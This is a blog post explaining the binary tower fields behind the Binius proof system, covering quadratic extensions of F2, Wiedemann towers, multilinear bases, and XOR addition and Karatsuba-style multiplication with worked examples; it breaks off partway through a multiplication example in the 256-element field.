The fields powering Binius

Unknown — Thu, 12 Jun 2025 00:00:00 +0000
The development of general-purpose zkVMs has made writing verifiable applications easier, by allowing developers to write high-level code and then compiling it to RISC-V or another instruction set architecture (ISA) and running it on top of the virtual machine. The virtual machine then generates a succinct proof of execution using a proof system, such as STARKs or Groth16. Recent advances in proof systems have allowed to reduce proving times, and we are heading towards real-time proving of Ethereum blocks. Binius</a> is a proof system that was developed focusing on how to create a technology that is hardware-friendly. Knowing how hardware works, a tailored proof system with really fast mathematics on it can yield significant improvements. Petra</a> is the first virtual machine to leverage Binius. What makes Binius special and how does it work?</p>
In this article we will review the basic mathematics behind the Binius protocol, which exploits the boolean hypercube $\mathcal{B_\ell} = \{0 , 1 \}^\ell$. We’ll concentrate in an elementary description of binary towers and the representation of field elements, as well as addition and multiplication of field elements exploiting their natural relation with circuit level operations. Throughout this article, we will cover some of the ground material from which binary towers emerge and came to life as a technologically interesting object, namely:</p>
    * Diamond and Posen's work from 2023, ["Succint Arguments over Towers of Binary Fields"](https://eprint.iacr.org/2023/1784)</span></span>
    * David Cantor's seminal 1989 paper ["On Arithmetical Algorithms over Finite Fields"](https://www.sciencedirect.com/science/article/pii/0097316589900204)</span></span>
    * Wiedemann's 1987 article ["An Iterated Quadratic Extension of GF(2)"](https://www.fq.math.ca/Scanned/26-4/wiedemann.pdf)</span></span></code></pre>
For more background material, see our previous post on Binius part 1</a> and Binius part 2</a></p>
Field extensions and representation of field elements</h2>
In the following discussion, we will fix $\mathbb{F_2} = {0,1}$ as the field with two elements. Finite field extensions of degree $d$ of this field can be characterized as the quotient ring</p>
$$\mathbb{F}_{q} \equiv \mathbb{F}[X]/\langle f(X)\rangle$$</p>
where $f$ is any irreducible polynomial $f \in \mathbb{F_2} [X]$ of degree $d$: this field has exactly $q = 2^d$ elements and consists of all the remainders of polynomial division by $f$. In other words, it consists of polynomials of degree at most $d - 1$ with coefficients in $\mathbb{F_2}$. Also, this extension can be viewed as a vector space of dimension $d$ over the base field $\mathbb{F_2}$ which is a very nice feature. The collection</p>
$$B_q = \{1 , X , X^2 ,\ldots, X^{d - 1} \}$$</p>
commonly called “the monomial basis” and upon fixing this basis, an isomorphism identifying such a polynomial with its $\mathbb{F_2}$ coordinates is established. Addition and multiplication of field elements when viewed as polynomials, are performed modulo $f$.</p>
Example</h3>
Consider the polynomial $$f(X) = X^2 + X + 1$$ as an element in $\mathbb{F_2} [X]$. The $f$ is irreducible; if it had a non-trivial factor $g$ then $\deg(g) = 1$ and since $g \in \mathbb{F_2} [X]$ that would force that a root of $g$ be a root of $f$. Since $f$ has no roots in the base field, then we conclude that $f$ is irreducible and</p>
$$\mathbb{F}[X]/\langle X^2+X+1\rangle $$</p>
is indeed a degree 2 extension of $\mathbb{F_2}$; this means that it can be considered as a dimension 2 vector space over the base field. The canonical basis for this vector space is then</p>
$$B_2 = \{1 , X \}$$</p>
and all its elements can be listed as linear combinations of elements of $B_2$:</p>
$$\mathbb{F_4} = \{0 , 1 , X , 1 + X \}$$</p>
The coordinate Representation of $\mathbb{F_4}$ over $\mathbb{F_2}$ can be viewed in the following table</p>
Polynomial Representation</th> Coordinate Representation</th></tr></thead>

$0$</td> $(0, 0)$</td></tr>
$1$</td> $(1, 0)$</td></tr>
$X$</td> $(0, 1)$</td></tr>
$1 + X$</td> $(1, 1)$</td></tr>
</tbody></table>
The field operations in the extensions are ring operations in $\mathbb{F_2} [X]$ taken to the quotient field by considering the non-trivial relation $X^2 + X + 1 = 0 \iff X^2 = 1 + X$. This is sometimes interpreted in a straightforward manner: now $X$ becomes a root of $f$ in the field extension $\mathbb{F_4}$</strong>.</p>

We observe that the irreducibility of $f$ in the last example was simple since the degree of $f$ was low enough: if $\deg(f)\leq 3$ then $f$ is irreducible over $\mathbb{F}[X] \iff \quad f$ has no roots in $\mathbb{F}$ (this is a theorem in the theory of fields).</p>
Definition (Quadratic extensions):</strong> Field extensions defined by quotienting by irreducible polynomials of degree 2 are called quadratic</em>.</p>
Definition (Towers of fields):</strong> Whenever there are fields $K,E,F$ such that</p>
$$K,\subset, E\quad\text{ and }\quad E,\subset, F$$</p>
we say that $E$ is an extension of $K$</em> (usually noted $E,\rvert K$) and that $F$ is an extension of $E$</em>. Putting these extensions together result in a tower of extensions</em> , and we denote it by $F\rvert\quad E\quad \rvert\quad K$.</p>
It turns out that concatenating field extensions at first sight might seem alien and overly complicated but ultimately, will yield great results.</p>
Extended example: two constructions of $\mathbb{F_{16}}$</h3>
Let’s work two different realizations of the field of 16 elements and see how fields are constructed.</p>
First construction:</strong> $\mathbb{F_{16}}$ as quotient by a degree 4 polynomial:</p>
To construct the field $\mathbb{F_{16}}$ we need to find an irreducible polynomial of degree 4 over the field of two elements, $\mathbb{F_2} = \{0, 1 \}$. One such irreducible polynomial is:

$$p(X) = X^4 + X + 1$$</p>
To verify that this polynomial is irreducible over $\mathbb{F_2}$, we need to check that it has no roots in $\mathbb{F_2}$ and</strong> that it cannot be factored into the product of two irreducible polynomials of degree 2 over $\mathbb{F_2}$.</p>
    1. **No roots in $\mathbb{F_2}$:**  </span></span></code></pre>
- $p(0) = 0^4 + 0 + 1 = 1 \neq 0$

- $p(1) = 1^4 + 1 + 1 = 1 + 1 + 1 = 1 \pmod{2} \neq 0$

Since $p(X)$ has no roots in $\mathbb{F_2}$, it has no linear factors $(X - a)$ where $a \in \mathbb{F_2}$</p>
    2. **No factorization into two irreducible polynomials of degree 2:**  </span></span></code></pre>
The only irreducible polynomial of degree 2 over $\mathbb{F_2}$ is $X^2 + X + 1$. If $X^4 + X + 1$ were reducible into two degree 2 polynomials, it would have to be $(X^2 + X + 1)(X^2 + aX + b)$, where $a, b \in \mathbb{F_2}$.

Expanding this product:

$$(X^2 + X + 1) (X^2 + aX + b) = X^4 + (a + 1)X^3 + (b + a + 1)X^2 + (b + a) X + b$$

Comparing the coefficients with $X^4 + 0X^3 + 0X^2 + 1X + 1$:

- Coefficient of $X^3$: $a + 1 = 0 \implies a = 1$

- Coefficient of $X^2$: $b + a + 1 = 0 \implies b + 1 + 1 = b = 0$

- Coefficient of $X$: $b + a = 1 \implies 0 + 1 = 1$ (This is consistent)

- Constant term: $b = 1$

We have a contradiction since we found $b = 0$ and $b = 1$. Therefore, $X^4 + X + 1$ cannot be factored into two irreducible polynomials of degree 2 over $\mathbb{F_2}$.</p>
Since $p(X) = X^4 + X + 1$ is irreducible of degree 4 over $\mathbb{F_2}$, the quotient ring

$$\mathbb{F_2} [X] / \langle X^4 + X + 1 \rangle$$

is a field with $2^4 = 16$ elements.</p>
Elements of this field can be represented as polynomials in $X$ of degree at most 3 with coefficients in $\mathbb{F_2}$; moreover, addition of these elements is done by adding the polynomials coefficient-wise modulo 2 while multiplication is done by multiplying the polynomials and then</strong> reducing the result modulo $X^4 + X + 1$. This reduction is achieved by repeatedly using the relation $X^4 \equiv -X - 1 \equiv X + 1 \pmod{X^4 + X + 1}$.</p>
For instance, to multiply $\alpha = 1 + X + X^3$ and $\beta = X^2 + X^3$,</p>
$$\alpha\cdot\beta = ( 1 + X + X^3 )\cdot (X^2 + X^3) = X^2 + X^3 + X^3 + X^4 + X^5 + X^6$$</p>
By making use of addition modulo 2 we may eliminate the third powers of $X$ and by the defining relation we may replace all powers of $X$ above 4:</p>
$$\alpha\cdot\beta = X^2 + ( 1 + X ) + X (1 + X) + X^2 ( 1 + X ) = X^2 + 1 + X + X + X^2 + X^2 + X^3$$</p>
and again by addition modulo 2, we obtain $\alpha \cdot \beta = 1 + X^2 + X^3$.</p>
We will see that even if it is straightforward to understand the mechanics of this pattern for multiplication, it is highly non-efficient. We would like to have a different way of representing elements in a field extension such that multiplication could be done fast and efficiently.</p>
Second construction</strong> : $\mathbb{F_{16}}$ as a sequence of quadratic extensions</p>
In this approach, we will construct the field of 16 elements by realizing a tower of fields which has $\mathbb{F_{16}}$ at the top; we will exploit quadratic extensions and the fact that when polynomials are of low degree (at most 3) their irreducibility can be deduced by looking for roots.</p>
Step 1: $\mathbb{F_4}$ as an extension of $\mathbb{F_2}$:</strong></p>
As before, we use the irreducible polynomial $p(t) = t^2 + t + 1$ over $\mathbb{F_2}$. Since extending $\mathbb{F_2}$ is adjoining a root $X_0$ of $f$, we will simply say that</p>
$$\mathbb{F_4} = \mathbb{F_2} (X_0 )$$</p>
and the four elements of this field are simply ${ 0, 1, X_0, 1 + X_0 }$, with $X_0^2 = X_0 + 1$.</p>
Step 2: $\mathbb{F_{ 16 }}$ as an extension of $\mathbb{F_4}$:</strong></p>
Since $\mathbb{F_4}$ has 4 elements, we need an irreducible polynomial of degree $2$ over $\mathbb{F_4}$ to construct $\mathbb{F_{16}}$ and grant $[\mathbb{F_{16}} : \mathbb{F_4} ] = 2$ (see here for degree of an extension</a>); consider the polynomial $$q(t) = t^2 + t + X_0$$ over $\mathbb{F_4}$. To check for irreducibility, we need to see if it has roots in $\mathbb{F_4} = {0, 1, X_0, 1 + X_0}$. So, let’s begin checking one by one:</p>
    * $q(0) = 0^2 + 0 + X_0 = X_0 \neq 0$</span></span>
    * $q(1) = 1^2 + 1 + X_0 = 1 + 1 + X_0 = 0 + X_0 = X_0 \neq 0$</span></span>
    * $q(X_0) = X_0^2 + X_0 + X_0 = (X_0 + 1) + X_0 + X_0 = X_0 + 1 + 0 = X_0 + 1 \neq 0$</span></span>
    * $$\begin{align*} q(1 + X_0) &= (1 + X_0)^2 + (1 + X_0) + X_0 = (1 + X_0^2) + 1 + X_0 + X_0 \\\\ &= 1 + (X_0 + 1) + 1 + 0 = X_0 + 1 + 1 = X_0 \neq 0 \end{align*}$$</span></span></code></pre>
Since $q(t)$ has degree 2 and no roots in $\mathbb{F_4}$, it is irreducible over $\mathbb{F_4}$ and the extension obtained by adjoining a root $X_1$ of $q$ yields</p>
$$\mathbb{F_{16}} = \mathbb{F_4} (Y) = \mathbb{F_2} (X_0 ) (X_1 ) = \mathbb{F_2} (X_0 , X_1 )$$</p>
subject to the relations:</p>
    * $X_0^2 = X_0 + 1$ (this comes from the first extension)</span></span>
    * $X_1^2 = X_1 + X_0$ (this comes from the second extension)</span></span></code></pre>
Each step is indeed defined by quotienting by an irreducible polynomial of degree 2, i.e. each step is a quadratic extension</em>. More importantly, each element in $\mathbb{F_{16}}$ is a linear combination with coefficients in $\mathbb{F_2}$ of the basis elements</p>
$$\{ 1 , X_0 ,X_1 ,X_0 \cdot X_1 \}$$</p>
A word about coordinates:</h3>
Let’s work out the coordinate representation of $\mathbb{F_{ 16 }}$ over $\mathbb{F_4}$ and over the base field $\mathbb{F_2}$. The elements of $\mathbb{F_{ 16 }}$ can be written in the form $$a + bX_1$$ where $a, b \in \mathbb{F_4}$. Since each of $a$ and $b$ has 4 choices, there are $4 \times 4 = 16$ elements in $\mathbb{F_{16}}$; also recall that a basis for $\mathbb{F_4}$ over $\mathbb{F_2}$ is $\{1, X_0 \}$ and that $\mathbb{F_{16}}$ over $\mathbb{F_4}$ is $\{1, X_1\}$.</p>
It is a well known theorem of the theory of fields a basis for the upper field in a tower consists of the multiplication of the basis elements in the lower extensions. But there’s a caveat: we will consider ordered basis. This means that in order to show a basis one must not only exhibit a linearly independent subset that spans the vector space, but also we need to make explicit the order</em> in which those elements lie in the basis. This order is needed in order to make available the use of coordinates. Considering the ordered basis above, let’s take a look at the elements in $\mathbb{F_{16}}$:</p>
Element in $\mathbb{F_{16}}$</th> Coordinates over $\mathbb{F_4}$</th> Coordinates over $\mathbb{F_2}$</th></tr></thead>

$0$</td> $(0, 0)$</td> $(0, 0, 0, 0)$</td></tr>
$1$</td> $(1, 0)$</td> $(1, 0, 0, 0)$</td></tr>
$X_0$</td> $(X_0, 0)$</td> $(0, 1, 0, 0)$</td></tr>
$1 + X_0$</td> $(1 + X_0, 0)$</td> $(1, 1, 0, 0)$</td></tr>
$X_1$</td> $(0, 1)$</td> $(0, 0, 1, 0)$</td></tr>
$1 + X_1$</td> $(1, 1)$</td> $(1, 0, 1, 0)$</td></tr>
$X_0 + X_1$</td> $(X_0, 1)$</td> $(0, 1, 1, 0)$</td></tr>
$(1 + X_0) + X_1$</td> $(1 + X_0, 1)$</td> $(1, 1, 1, 0)$</td></tr>
$X_0X_1$</td> $(0, X_0)$</td> $(0, 0, 0, 1)$</td></tr>
$1 + X_0X_1$</td> $(1, X_0)$</td> $(1, 0, 0, 1)$</td></tr>
$X_0 + X_0X_1$</td> $(X_0, X_0)$</td> $(0, 1, 0, 1)$</td></tr>
$(1 + X_0) + X_0 X_1$</td> $(1 + X_0, X_0)$</td> $(1, 1, 0, 1)$</td></tr>
$(1 + X_0 ) X_1$</td> $(0, 1 + X_0)$</td> $(0, 0, 1, 1)$</td></tr>
$1 + (1 + X_0 ) X_1$</td> $(1, 1 + X_0)$</td> $(1, 0, 1, 1)$</td></tr>
$X_0 + (1 + X_0 ) X_1$</td> $(X_0, 1 + X_0)$</td> $(0, 1, 1, 1)$</td></tr>
$(1 + X_0) + (1 + X_0 ) X_1$</td> $(1 + X_0, 1 + X_0)$</td> $(1, 1, 1, 1)$</td></tr>
</tbody></table>
The way monomial basis are chosen also show how coordinates in succesive basis relate to one another: for instance, suppose we take an element $$\omega=a + bX_1 \in \mathbb{F_{16}} \quad \text{ with } a, b \in \mathbb{F_4}$$ and we represent $\omega$ by its coordinates $(a, b)$. If we now express $a$ and $b$ in terms of the basis $\{1, X_0 \}$ over $\mathbb{F_2}$ then we’ll be able to find the coordinates of $\omega$ over $\mathbb{F_2}$ by simply concatenating coordinates of $a$ and $b$!</p>
To illustrate what the table is saying, take the element $\omega = X_0 + X_1$. Over $\mathbb{F_4}$, it is $X_0 \cdot 1 + 1 \cdot X_1$, so the coordinates are $$[\omega]^{ \mathbb{F_4} } = ( X_0 , 1)$$.

Now, $[ X_0 ]^{ \mathbb{F_2} } = (0 , 1)$ and $[1]^{\mathbb{F_2}} = (1,0)$, so</p>
$$[X_0 + X_1]^{ \mathbb{F_2} } = (0, 1, 1, 0)$$</p>
We repeat what we mentioned earlier: whenever a choice of basis is made, there’s also a choice of order of the basis elements; mathematically speaking, basis consisting of the same elements but in a different order are different basis. In this exposition, the order is selected folklorically, reading the basis from left to right, aggregating elements as we read matching the succesive extensions. This is not the only way this could be done; as a matter of fact, the reverse ordering is popular among computer scientists.</p>
Wiedemann towers and the work of Diamond and Posen</h2>
What we have just seen in the example of $\mathbb{F_{16}}$ is an instance of a Wiedemann tower</em> : a sequence of field extensions such that each extension is a quadratic extension of the previous one, represented in such a way that a basis of the extension can be obtained by adjoining roots of a certain sequence of irreducible polynomials at the time. In the case just seen, the basis was simply</p>
$$\mathcal{B} = \{1, X_0 ,X_1 ,X_0 X_1 \}$$</p>
and the field elements are simply $\mathbb{F_2}$ linear combinations of these symbols: we will commonly view them as polynomials in 2 variables over $\mathbb{F_2}$ in which all the variables appear raised to the first power, at most. These polynomials are usually called “multilinear” in the cryptography context. These type of field extensions and polynomials are central to the work of Ben Diamond and Jim Posen in their proposition for a setting in which zero knowledge protocols can be implemented in characteristic 2 for more efficient performance relying on circuitry-level arithmetical operations: BINIUS</strong>. The binary tower defined in their work is defined just like an iterative quadratic sequence of extensions, inspired in the work of Wiedemann. To match their notation set $\mathcal{T_0} = \mathbb{F_2}$ and then recursively define</p>
$$\mathcal{T_{ k + 1}} = \mathcal{T_{k}} [X_{ k + 1}]/ \langle f_{ k + 1} \rangle$$</p>
where $f_{ k + 1 } ( X_{ k + 1 }) = X_{ k + 1 }^2 + X_{k} X_{ k + 1 } + 1$; Wiedemann proved that this polynomial is indeed irreducible over $\mathcal{T_k}$ and so it defines $\mathcal{T_{ k + 1}}$ as a quadratic extension of $\mathcal{T_{k}}$. Briefly write down a few extensions</p>
$$\mathbb{F_2} = \mathcal{T_0},\quad \mathbb{F_4} = \mathcal{T_1} , \quad \mathbb{F_{16}} = \mathcal{T_2},\ldots $$</p>
We will usually refer to $\mathcal{T_k}$ as the $k-$th level or extension of $\mathcal{T_0}$; and such a field has exactly $2^{ 2^k }$ elements. In such level, elements are described as polynomials in the set of $k$ variables $\{X_0 , X_1 , \ldots, X_{ k - 1} \}$ such that every $X$ is raised to a power at most 1, this is, they are linear combinations over $\mathbb{F_2}$ of multilinear monomials. For simplicity, there is also an extremely convenient way to point to specific monomials and it relates to the binary expansion of the non-negative integers.</p>
To make this clear, suppose we need to find the $n-$th basis element, and we’ll call it $y_n$. To do that, we simply expand $n$ in base 2:</p>
$$n = \sum \limits_{ i = 0 } n_i 2^i , \quad \text{ where } n_i \in {0,1}$$</p>
and then set</p>
$$y_n = \prod_{i: n_i = 1} X_i$$</p>
For instance, to obtain the tenth basic element in the Wiedemann tower, first expand in base 2:</p>
$$10 = 0\cdot 2^0 + 1 \cdot 2^1 + 0 \cdot 2^2 + 1\cdot 2^3 , \quad\text{ or more briefly } [10]^2 = [1010]$$</p>
(and you need to remember that it is customary in computer science to start the expansion with the most significant digit and that counts of elements usually start at zero), and then build</p>
$$y_{10} = X_1 X_3$$</p>
This specific ordering of the basis, which we admitted naturally from the conversation is indeed a lexicographic order</em> , and such fact which will allow various things:</p>
    * First of all, it will allow us to eyeball if an elements belongs to a specific subfield of $\mathcal{T_k}$; whenever the coordinate vector associated to a level $k$ element has its last half of coordinates equal to zero, then we know it belongs to $\mathcal{T_{ k - 1}}$</span></span>
    * This previous fact shows that the tower construction nicely embeds $\mathcal{T_{ k - 1}}$ into $\mathcal{T_k}$ by zero padding in the last half of the coordinate vector. Computationally it has "zero cost" to view elements from a subfield as an element of an extension of that field.</span></span></code></pre>
This properties make the Wiedemann towers so suitable for coding and chip-level implementations: there is no mathematical guarantee on arbitrary extensions that we can identify to which subfield an element belongs to. However, in this case and due to the highly structured nature of these fields, that problem can be sometimes quickly solved. Or phrased better: we can easily characterize subfields of the extension.</p>
Field operations and the issue of multiplication</h2>
An interesting aspect of these type of towers is the way coordinates behave under the usual field operations.</p>
Addition</h3>
The relationship between addition in $\mathbb{F_2}$ (which is the operation performed on the coordinates) and the XOR operation is direct and fundamental. Addition of two elements in a finite extension $\mathcal{T_k}$ is performed by adding their corresponding coordinates modulo 2. Since addition modulo 2 is equivalent to the XOR operation, addition is a very fast and efficient bitwise operation in most processor architectures.</p>
Multiplication</h3>
Now here is where things get slippery. Multiplication of field elements can be carried out in different ways according to how those elements are represented. Let’s begin with</p>
Multiplication the naive way: polynomials with reduction</h4>
One of the more straightforward way of multiplying elements in a field extension is by first representing elements as polynomials, then multiplying those polynomials and finally reducing the product modulo the irreducible that defines the extension of $\mathbb{F_2}$.</p>
To illustrate, consider $u,v \in \mathcal{T_2}$. Let’s go slowly.</p>
Multiplication as Polynomials in $X_1$ with Coefficients in $\mathcal{T_1}$:</strong></p>
$$
\begin{align*}
u \cdot v &= ((1 + X_0) + X_1)(X_0 + X_0X_1) \\
&= (1 + X_0)X_0 + (1 + X_0)X_0X_1 + X_1X_0 + X_1(X_0X_1) \\
&= (X_0 + X_0^2) + (X_0 + X_0^2 ) X_1 + X_0 X_1 + X_0 X_1^2
\end{align*}
$$</p>
Now, we substitute $X_0^2 = X_0 + 1$ and $X_1^2 = X_1 X_0 + 1$:</p>
$$
\begin{align*}
&= (X_0 + X_0 + 1) + (X_0 + X_0 + 1)X_1 + X_0 X_1 + X_0(X_1 X_0 + 1) \\
&= (2X_0 + 1) + (2X_0 + 1)X_1 + X_0 X_1 + X_1 X_0^2 + X_0)
\end{align*}
$$</p>
Since we are in a field with characteristic 2, $2X_0 = 0$. So,</p>
$$
\begin{align*}
&= 1 + X_1 + X_0X_1 + X_1(X_0 + 1) + X_0 \\
&= 1 + X_1 + X_0X_1 + X_0X_1 + X_1 + X_0 \\
&= 1 + X_0
\end{align*}
$$

So, $((1 + X_0 ) + X_1 )(X_0 + X_0 X_1 ) = 1 + X_0$ in $\mathcal{T_2}$.</p>
As the reader may have guessed - this is a lot of work. We’d like to have a more efficient algorithm for multiplication of field elements that draws from the highly structured tower of extensions.</p>
One way of having a systematic approach to field element multiplication is by using a Karatsuba-like technique.</p>
Karatsuba-like Multiplication in the Wiedemann Tower</h4>
The primary aim of the Karatsuba algorithm, when applied to multiplication of elements in a finite field extension (like the levels of the Wiedemann tower), is to reduce the number of field multiplications</strong> in the larger field by increasing the number of field additions</em> and sub-field multiplications</em> by exploiting the fact that additions (done through XOR) is computationally cheap.</p>
Specifically, for multiplying two degree-1 polynomials over a subfield, a naive approach would require four multiplications in the subfield. Karatsuba’s method achieves this with only three multiplications</strong> and a few additions in the subfield. This seemingly small reduction becomes significant when applied recursively across many levels of a tower extension, leading to a sub-quadratic asymptotic complexity.</p>
Let’s start describing the Karatsuba formula for multiplication of two elements in $\mathcal{T_k}$ (which are polynomials of degree at most 1 in $X_{ k - 1}$ with coefficients in $\mathcal{T_{ k - 1}}$) by stating what the multiplication looks like and then by sharpening our eye:</p>
Suppose that we need to multiply together $$u = \alpha_0 + \alpha_1 X_{ k - 1 }\quad \text{and } \quad v = \beta_0 + \beta_1 X_{ k - 1}$$ with $\alpha_i, \beta_i \in \mathcal{T_{ k - 1}}$ for $i = 0,1$. Then multiplication obeys the distributive law and so the product we’re looking for is then</p>
$$u\cdot v = \alpha_1 \beta_1 X_{ k - 1}^2 + (\alpha_0 \beta_1 + \alpha_1 \beta_0) X_{ k - 1} + \alpha_0 \beta_0 $$</p>
    * **Step 1: Compute the three intermediate products in the subfield $\mathcal{T_{ k - 1 }}$.**</span></span></code></pre>
This is where the Karatsuba trick reduces multiplications. Instead of computing the four products involving $\alpha_i\beta_j$, we resort to compute three multiplications instead:</p>
    * $P_A = \alpha_0 \beta_0$</span></span>
    * $P_B = \alpha_1 \beta_1$</span></span>
    * $P_C = (\alpha_0 + \alpha_1)(\beta_0 + \beta_1)$</span></span></code></pre>
and note that in characteristic two these three products suffice to produce the coefficents in $u\cdot v$ since</p>
$$P_A + P_B + P_C = \alpha_0 \beta_1 + \alpha_1 \beta_0 = M$$</p>
We commonly call $M$ the “middle term”. These three multiplications and two additions are performed in $\mathcal{T_{ k - 1}}$.</p>
    * **Step 2: Reduce the product using the defining irreducible polynomial.**</span></span></code></pre>
Up to this point, the product is given by:</p>
$$P_B X_{ k - 1 }^2 + MX_{ k - 1} + P_A$$</p>
Now the relation $X_{ k - 1 }^2 = X_{ k - 2} X_{ k - 1} + 1$ will yield the final expression for the desired product:</p>
$$u\cdot v= (P_A + P_B) + (M + P_B X_{ k - 2}) X_{ k - 1}$$</p>
This is the final reduction to the canonical polynomial representation of the element. There is something relevant to point out exactly here. How is this computation performed?</p>
    * As mentioned before, the coefficients $P_A + P_B$ and $M + P_B X_{k - 2}$ computed in the subfield $\mathcal{T_{ k - 1}}$.</span></span>
    * To compute the greater linear combination, we must compute the product</span></span></code></pre>
$$(M + P_B X_{ k - 2}) X_{ k - 1}$$</p>
first. The catch is that when considering $\mathcal{T_k}$ as a vector space over $\mathcal{T_0}$, multiplication by $X_{ k - 1}$ is then an automorphism, so the product mentioned above can be obtained by matrix multiplication once we look at the elements in the convenient level of the Wiedemann tower (and here is where the way the subfields are linked together pays dividends). Explicitly, we first interpret $M + P_B X_{ k - 2}$ as an element of the upper field $\mathcal{T_k}$. In coordinates this fact is expressed by padding the coordinates $[\cdot]^{ k - 1}$ with zeros to obtain its coordinates $[\cdot]^k$:</strong></p>
$$[M + P_B X_{ k - 2}]^k = [ [M + P_B X_{ k - 2}]^{ k - 1}:, 0,0,\cdots 0]$$</p>
If we consider $M + P_B X_{ k - 2} \in \mathcal{T_k}$ then the product against $X_{ k - 1}$ con be performed in coordinates by matrix multiplication:</p>
$$[(M + P_B X_{ k - 2}) X_{ k - 1 }]^{k} = [M + P_B X_{ k - 2}]^{k} A_{ k - 1}$$</p>
where $A_k$ is the matrix that has as rows</strong> the coordinates over $\mathcal{T_k}$ of the products of the basis elements of $\mathcal{T_k}$ by $X_{ k - 1}$.</p>
    * The final addition is performed in the top field $\mathcal{T_k}$; in coordinates this is simply done by XOR.</span></span></code></pre>A quick summary, so far:</h2>
    * **Concatenation for Hierarchy:** The key insight of the multilinear basis (as implicitly adopted by Diamond and Posen) is that an element's representation in $\mathcal{T_k}$ is simply the concatenation of its coefficients from $\mathcal{T_{ k - 1}}$. This means you can "unpack" an element into its sub-elements simply by splitting its bit string. This is a "free" operation, involving no computation beyond index manipulation.</span></span>
    * **Recursive Application:** The Karatsuba algorithm maps perfectly to this recursive structure. This is exactly how the algorithm is designed to work efficiently.</span></span>
    * **Bitwise XOR for Additions:** All additions are simply bitwise XORs ($\oplus$) on the coordinate vectors. This is exceptionally fast on modern processors, which can perform XOR on entire machine words in a single cycle.</span></span>
    * **Defined Reductions:** The irreducible polynomials ($X_0^2 = X_0 + 1$, $X_1^2 = X_0 X_1 + 1$, $X_2^2 = X_1 X_2 + 1$) are simple trinomials or binomials in $\mathbb{F_2}$. The reduction step (e.g., $X_1^2 \to X_0 X_1 + 1$) translates into a linear transformation on the coefficient vector that can be done with a few XORs and re-indexing.</span></span>
    * **Small Coefficients:** Because the field is $\mathbb{F_2}$, all coefficients ($a_0, a_1, \ldots$) are single bits (0 or 1). This simplifies the base multiplications within the $M_1$ function, making it extremely efficient.</span></span></code></pre>An extended example, by hand</h2>
Let’s work out the product of two elements in $\mathcal{T_3}$, namely</p>
$$u = X_0 + X_1 X_2 \quad\text{and }\quad v = 1 + X_1 + X_0 X_2$$</p>
using the aforementioned algorithm. Before going any further, and just because we want to avoid the pain of going way too deep in the recursion, we can be practical and cook up the matrix for the “multiplication by $X_0$” map. This matrix is then</p>
$$

\boxed{

\begin{matrix}

0 & 1 \newline

1 & 1

\end{matrix}

}

$$</p>
and helps building a complete multiplication table; to multiply $\gamma$ by $X_0$ we compute</p>
$$

[\gamma]^{1} \cdot \boxed{

\begin{matrix}

0 & 1 \newline

1 & 1

\end{matrix}

} = [\gamma\cdot X_0 ]^1

$$</p>
For a full multiplication table covering all possible field element multiplications in $\mathcal{T_1}$, we resort to linearity and the gadget above.</p>
Let’s get started. Remember that $\mathcal{T_3}$ is a field with $2^{ 2^3 } = 2^8 = 256$ elements, and as a vector space over $\mathbb{F_2} = \mathcal{T_0}$ is has dimension 8; its multilinear basis is then</p>
$$\{1, X_0 ,X_1 ,X_0 X_1 ,X_2 ,X_0 X_2 ,X_1 X_2 ,X_0 X_1 X_2 \}$$</p>
We will carry out the product of $u$ and $v$ in coordinates. First of all,</p>
$$[u]^3 = (0,1,0,0,0,0,1,0) \quad\text{and }\quad [v]^3 =(1,0,1,0,0,1,0,0)$$</p>
are the coordinates of $u$ and $v$ in the multilinear basis for $\mathcal{T_3}$. Before carrying out Karatsuba’s algorithm, we will display both set of coordinates in matrix form and hint a partition corresponding to the canonical description of both elements as elements of the last extension in the tower. This is</p>
$$\begin{pmatrix}u\newline \hline v\end{pmatrix}^3 = \begin{pmatrix}

0 & 1 & 0 & 0 & 0 & 0 & 1 & 0 \newline

\hline

1 & 0 & 1 & 0 & 0 & 1 & 0 & 0

\end{pmatrix}=

\left(

\begin{array}{cccc:cccc} % ‘c’ for centered column, ‘:’ for a dotted vertical line

0 & 1 & 0 & 0 & 0 & 0 & 1 & 0 \newline

\hline % Solid horizontal line

1 & 0 & 1 & 0 & 0 & 1 & 0 & 0

\end{array}

\right)

= \left(

\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line

\alpha_0 & \alpha_1 \newline

\hline % Solid horizontal line

\beta_0 & \beta_1

\end{array}

\right)$$</p>
where we’re exploiting the fact that we can write $u$ and $v$ over the previous extension $\mathcal{T_2}$:</p>
$$u = \alpha_0 + \alpha_1 X_2 \quad\text{and }\quad v = \beta_0 + \beta_1 X_2$$</p>
for certain $\alpha_i , \beta_j \in \mathcal{T_2}$. Recall that this field has dimension 4 and that the previous matrix partition already gives us the coordinates over $\mathcal{T_0}$ of the coordinates over $\mathcal{T_2}$! This is the utterly COOL feature of multilinear basis for binary towers! We’re now ready to proceed with Karatsuba’s algorithm.</p>
    * **First step:** We proceed to compute the products</span></span>
    1. $P_A = \alpha_0 \beta_0$</span></span>
    2. $P_B = \alpha_1 \beta_1$</span></span>
    3. $P_C = (\alpha_0 + \alpha_1) (\beta_0 + \beta_1)$</span></span>
    4. $P_B X_1$</span></span></code></pre>
where all of these elements belong to and action is done in the subfield $\mathcal{T_2}$.</strong> In order to do this, we need to go one layer deep for each of the products needed. Let’s proceed with caution.</p>
i. To calculate $P_A$ we interpret the coordinates over $\mathcal{T_2}$ in coordinates over $\mathcal{T_0}$</strong> and just as in the previous layer and write</p>
$$\begin{pmatrix}\alpha_0\newline \hline \beta_0\end{pmatrix}^2=\begin{pmatrix}

0 & 1 & 0 & 0\newline

\hline % This command draws a solid horizontal line

1 & 0 & 1 & 0

\end{pmatrix}=

\left(

\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line

0 & 1 & 0 & 0 \newline

\hline % Solid horizontal line

1 & 0 & 1 & 0

\end{array}

\right)

= \left(

\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line

\alpha_{00} & \alpha_{01} \newline

\hline % Solid horizontal line

\beta_{00} & \beta_{01}

\end{array}

\right)$$</p>
Applying Karatsuba’s algorithm in this scenario requires reaching for the multiplication table we mentioned earlier,</p>
    * $P^\prime_A = \alpha_{00}\cdot\beta_{00}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{1, 0}=\boxed{0,1}$$</span></span>
    * $P^\prime_B = \alpha_{01}\cdot\beta_{01}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 0}\times \boxed{1, 0}=\boxed{0,0}$$</span></span>
